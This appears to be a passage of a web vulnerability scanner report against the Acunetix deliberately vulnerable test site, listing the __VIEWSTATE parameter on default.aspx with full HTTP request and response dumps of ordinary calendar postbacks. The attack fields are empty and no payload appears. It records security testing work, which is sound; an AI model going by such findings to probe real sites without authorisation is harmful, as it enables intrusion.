style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1109 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,109 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8469&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAUWT6INsIZGRk9gpiKywKjLmGEQG1Sfa8xTNo%2B2k%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKI4uisAQLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ87uRmMIW1IC7W0GOItwspv2xXV0%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:19:11 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAUWT6INsIZGRk9gpiKywKjLmGEQG1Sfa8xTNo+2k=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKI4uisAQLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ87uRmMIW1IC7W0GOItwspv2xXV0=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:White" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1109 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,109 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8457&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAXGeMF9sIZGRkRMLgCMv2gs7j769VZ8J%2BLt2MUuA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLdhIX7CwLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ2Do4ufFtNpxenP2aTfzcVjskHBU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:23 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgAAXGeMF9sIZGRkRMLgCMv2gs7j769VZ8J+Lt2MUuA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLdhIX7CwLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ2Do4ufFtNpxenP2aTfzcVjskHBU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:White" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not 